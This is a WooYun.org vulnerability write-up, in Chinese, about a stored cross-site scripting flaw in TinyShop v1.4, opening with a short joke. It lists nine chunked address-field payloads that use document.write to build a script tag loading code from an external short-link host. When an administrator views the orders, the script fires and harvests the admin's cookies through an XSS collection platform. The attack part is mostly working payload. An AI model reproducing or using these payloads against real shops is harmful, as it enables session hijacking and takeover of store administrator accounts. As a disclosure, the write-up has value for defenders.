WooYun.org

上午上课的时候，和傻强聊天：
我："傻强你有女朋友吗？"
傻强："有啊？"
我："那你记得你女朋友生日吗？"
傻强："等下，我去看下生产日期。。。"
我："。。。。"
TinyshopV1.4:
1、注册账号
2、添加地址
3、买东西，提交订单
4、管理查看订单，然后后台加载js代码
5、xss平台查看cookie
注册账号我就不说了：
添加地址处：（箭头所指处可控）

但是后台可以利用的参数只有：

而且长度只有：

加起来也只有40字符，好像不够啊~~~
不过后台订单是这样显示的：

那么，我们就分几次加载js代码就好了：
构造出9个恶意地址：
p1<script>x=/**/"<scr"</script>
p2<script>x%2B=/**/"ipt "</script>
p3<script>x%2B=/**/"src="</script>
p4<script>x%2B=/**/"//t.c"</script>
p5<script>x%2B=/**/"n/RAC"</script>
p6<script>x%2B=/**/"HQ7S><"</script>
p7<script>x%2B=/**/"\/sc"</script>
p8<script>x%2B=/**/"ript>"</script>
p<script>document./**/write(x)</script>
然后添加进去：

然后按p--->p1的地址顺序，买8样东西，提交订单：

体力活啊~~~

如上所示，js代码已经加载了：